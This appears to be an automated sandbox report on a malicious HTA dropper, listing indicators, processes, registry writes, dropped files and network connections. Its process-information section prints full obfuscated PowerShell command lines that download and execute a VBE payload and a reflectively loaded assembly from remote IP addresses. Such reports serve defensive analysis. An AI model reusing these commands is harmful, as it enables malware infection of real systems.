File name:

botharefgoodformajorworktogivebestthignstodobetter.hta

Full analysis: https://app.any.run/tasks/3c6292d2-7105-4fe5-a8d2-85851e997757
Verdict: Malicious activity
Analysis date: May 19, 2025, 17:44:05
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
susp-powershell
Indicators:
MIME: application/javascript
File info: JavaScript source, ASCII text, with very long lines (29407), with no line terminators
MD5:

FAC0940EB10EF7DD57EA7348D1176D02

SHA1:

5F5F6A707F54B9060B1CA82F3C1233D52751F724

SHA256:

7669571AB106028C768CA287ED8D40F62F74A8620A1814E00906BF5019648B24

SSDEEP:

96:/1I4kBWg4v+Wnkn9gLImHQhHHAHjEQD4R74cAkqe5WOwC4s:/1cBWWWnkn9sImHknejE9Akqe5WOwC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Accesses environment variables (SCRIPT)

      • mshta.exe (PID: 7000)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1300)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 5960)

    • Starts Visual C# compiler

      • powershell.exe (PID: 1300)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 1300)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 1532)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 7000)

    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 7000)
      • wscript.exe (PID: 6644)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)

    • Executes script without checking the security policy

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 1300)

    • Uses .NET C# to load dll

      • powershell.exe (PID: 1300)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 1072)

    • Executable content was dropped or overwritten

      • csc.exe (PID: 1072)

    • Connects to the server without a host name

      • powershell.exe (PID: 1300)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 6644)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7000)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)

    • Reads the machine GUID from the registry

      • csc.exe (PID: 1072)

    • Checks supported languages

      • csc.exe (PID: 1072)
      • cvtres.exe (PID: 5376)

    • Create files in a temporary directory

      • csc.exe (PID: 1072)
      • cvtres.exe (PID: 5376)

    • Checks proxy server information

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)

    • Drops encrypted VBS script (Microsoft Script Encoder)

      • powershell.exe (PID: 1300)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • cmd.exe (PID: 5960)
      • powershell.exe (PID: 1532)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 1532)

    • Disables trace logs

      • powershell.exe (PID: 1532)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 1532)

    • Reads the software policy settings

      • slui.exe (PID: 3888)

    • Failed to connect to remote server (POWERSHELL)

      • powershell.exe (PID: 1532)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1532)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1532)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
140
Monitored processes
12
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start mshta.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe sppextcomobj.exe no specs slui.exe csc.exe cvtres.exe no specs wscript.exe no specs powershell.exe conhost.exe no specs slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1072"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\nkcfha5o.cmdline"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
1300pOWErsheLL -ex ByPAss -nOp -w 1 -c DeVICecRedENTIALdepLoYMeNt ; iEX($(Iex('[sYstem.Text.ENcoDInG]'+[chAr]0X3A+[Char]0X3A+'uTF8.GEtSTRING([SYStEm.CONVErt]'+[cHar]0x3A+[CHaR]58+'fROmBasE64sTRIng('+[ChAR]0x22+'JHRSSGhRQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRXJkRWZpTklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb04uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiY2xoLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiUVpuT2csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpkSWlsYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaWxuWG5oZ0h3LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkUmlqc0NBUURSaCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS0RPS3JOb25QbEUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR0UkhoUUE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjQ3LjE2NC85NzAvYm90aGFyZWZnb29kZm9ybWFqb3J3b3JrdG9naXZlYmVzdHRoaWduc3RvZG9iZXR0ZXIudmJlIiwiJEVOVjpUTVBcYm90aGFyZWZnb29kZm9ybWFqb3J3b3JrdG9naXZlYmVzdHRoaWduc3RvZG9iZXR0ZS52YmUiLDAsMCk7U3RBUnQtU2xFRVAoMyk7SW5WT0tlLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6VE1QXGJvdGhhcmVmZ29vZGZvcm1ham9yd29ya3RvZ2l2ZWJlc3R0aGlnbnN0b2RvYmV0dGUudmJlIg=='+[CHar]34+'))')))"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
1532"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$mavis = 'JABvAHYAZQByAHQAaQBsAHQAIAA9ACAAJwB0AHgAdAAuAHIAZQB0AHQAZQBiAG8AZABvAHQAcwBuAGcAaQBoAHQAdABzAGUAYgBlAHYAaQBnAG8AdABrAHIAbwB3AHIAbwBqAGEAbQByAG8AZgBkAG8AbwBnAGYAZQByAGEAaAB0AG8AYgAvADAANwA5AC8ANAA2ADEALgA3ADQALgAzADcAMQAuADcAMAAxAC8ALwA6AHAAdAB0AGgAJwA7ACQAYwBlAG4AdAByAGkAcwBjAGkAZgBvAHIAbQBlAHMAIAA9ACAAJABvAHYAZQByAHQAaQBsAHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAHQAcgBlAGEAYwBoAGUAcgBzACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgAxADMANwAuADIAMgAuADEAMAAxAC8AeABhAG0AcABwAC8AYwB2AC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwAnADsAJAB0AGkAbQBlAHoAbwBuAGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdABpAG0AZQB6AG8AbgBlAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGQAZQBtAG8AbgBpAHMAZQBkACAAPQAgACQAdABpAG0AZQB6AG8AbgBlAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHQAcgBlAGEAYwBoAGUAcgBzACkAOwAkAGQAbwBzAGEAZwBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABlAG0AbwBuAGkAcwBlAGQAKQA7ACQAYQBtAGUAbgBkAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABhAGMAbgBlAHMAdABpAHMAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcAByAGUAYwBsAGEAcgBlACAAPQAgACQAZABvAHMAYQBnAGUALgBJAG4AZABlAHgATwBmACgAJABhAG0AZQBuAGQAZQByAHMAKQA7ACQAdAByAGEAbgBxAHUAaQBsAGkAcwBlACAAPQAgACQAZABvAHMAYQBnAGUALgBJAG4AZABlAHgATwBmACgAJABhAGMAbgBlAHMAdABpAHMAKQA7ACQAcAByAGUAYwBsAGEAcgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAdAByAGEAbgBxAHUAaQBsAGkAcwBlACAALQBnAHQAIAAkAHAAcgBlAGMAbABhAHIAZQA7ACQAcAByAGUAYwBsAGEAcgBlACAAKwA9ACAAJABhAG0AZQBuAGQAZQByAHMALgBMAGUAbgBnAHQAaAA7ACQAbgBvAG4AZQBtAGUAdABpAGMAIAA9ACAAJAB0AHIAYQBuAHEAdQBpAGwAaQBzAGUAIAAtACAAJABwAHIAZQBjAGwAYQByAGUAOwAkAGYAZQBlAGQAdABoAHIAbwB1AGcAaAAgAD0AIAAkAGQAbwBzAGEAZwBlAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHAAcgBlAGMAbABhAHIAZQAsACAAJABuAG8AbgBlAG0AZQB0AGkAYwApADsAJAB1AG4AcAB1AG4AaQBzAGgAYQBiAGwAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAGUAZQBkAHQAaAByAG8AdQBnAGgAKQA7ACQAYwBoAGEAcABlAHIAbwBuAG4AZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJAB1AG4AcAB1AG4AaQBzAGgAYQBiAGwAZQApADsAJABzAGgAbwBwAHcAbwByAG4AIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJABjAGUAbgB0AHIAaQBzAGMAaQBmAG8AcgBtAGUAcwAsACcAJwAsACcAJwAsACcAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwB1AG4AYwBsAGkAbQBiAGUAZAAnACwAJwB2AGIAcwAnACwAJwAnACwAJwAnACwAJwBTAGEAaQBvAG4AagBpACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$palmad = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($mavis));Invoke-Expression $palmad;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
1676\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2504\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3096C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
3888"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5376C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESDA54.tmp" "c:\Users\admin\AppData\Local\Temp\CSC1676661D34C8462E8A2574EBC9643511.TMP"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
5960"C:\WINDOWS\system32\cmd.exe" "/C pOWErsheLL -ex ByPAss -nOp -w 1 -c DeVICecRedENTIALdepLoYMeNt ; iEX($(Iex('[sYstem.Text.ENcoDInG]'+[chAr]0X3A+[Char]0X3A+'uTF8.GEtSTRING([SYStEm.CONVErt]'+[cHar]0x3A+[CHaR]58+'fROmBasE64sTRIng('+[ChAR]0x22+'JHRSSGhRQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRXJkRWZpTklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb04uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiY2xoLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiUVpuT2csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpkSWlsYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaWxuWG5oZ0h3LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkUmlqc0NBUURSaCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS0RPS3JOb25QbEUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR0UkhoUUE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjQ3LjE2NC85NzAvYm90aGFyZWZnb29kZm9ybWFqb3J3b3JrdG9naXZlYmVzdHRoaWduc3RvZG9iZXR0ZXIudmJlIiwiJEVOVjpUTVBcYm90aGFyZWZnb29kZm9ybWFqb3J3b3JrdG9naXZlYmVzdHRoaWduc3RvZG9iZXR0ZS52YmUiLDAsMCk7U3RBUnQtU2xFRVAoMyk7SW5WT0tlLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6VE1QXGJvdGhhcmVmZ29vZGZvcm1ham9yd29ya3RvZ2l2ZWJlc3R0aGlnbnN0b2RvYmV0dGUudmJlIg=='+[CHar]34+'))')))"C:\Windows\SysWOW64\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
6576C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
15 030
Read events
15 008
Write events
22
Delete events
0

Modification events

(PID) Process:(7000) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7000) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7000) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1300) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(1300) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(1300) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1300) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids
Operation:writeName:VBEFile
Value:
(PID) Process:(1532) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1532) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(1532) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
1
Suspicious files
4
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
1300powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_plb444vq.flm.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1300powershell.exeC:\Users\admin\AppData\Local\Temp\nkcfha5o.0.cstext
MD5:88854F2E82D733E29DAACC1FADD9F47E
SHA256:ADEE1BA5296DAC9742F9E196C32238AFF5F62FD2D301863C78C35DEAA186A1EF
1300powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lefbshjd.rj3.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1300powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pulkxdb4.eiv.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1300powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:3252B37D83421C22EF5C9D59215D4B48
SHA256:B3F0000B0683F43E8435A84D61B17F7258104DE45E87CBDB2025D9C6135600B8
1532powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nmwqfj3j.hm4.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1532powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xsqgoy2a.dt3.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5376cvtres.exeC:\Users\admin\AppData\Local\Temp\RESDA54.tmpbinary
MD5:15505B1C8CDA2C36298F50E00CEECB4D
SHA256:23FF466BF146093D12C27FAF605407154E0A68ECEBA71EE21689107517E7B98D
1072csc.exeC:\Users\admin\AppData\Local\Temp\CSC1676661D34C8462E8A2574EBC9643511.TMPbinary
MD5:0D5AD3A848B09F738D74257F93C9D2C0
SHA256:43E172FC4991E2401B2A8396636E2061BEC54204563C6FEA0B4D2599D4EF160A
1072csc.exeC:\Users\admin\AppData\Local\Temp\nkcfha5o.dllexecutable
MD5:01838917EB83452F6BBE5F25D685CDD6
SHA256:CC05A11028CE57655BAAF832E75C88E9D8CCF97D6F408DA764C1410DE7878320
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
21
DNS requests
15
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1300
powershell.exe
GET
200
107.173.47.164:80
http://107.173.47.164/970/botharefgoodformajorworktogivebestthignstodobetter.vbe
unknown
unknown
4428
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4428
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.66:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1300
powershell.exe
107.173.47.164:80
AS-COLOCROSSING
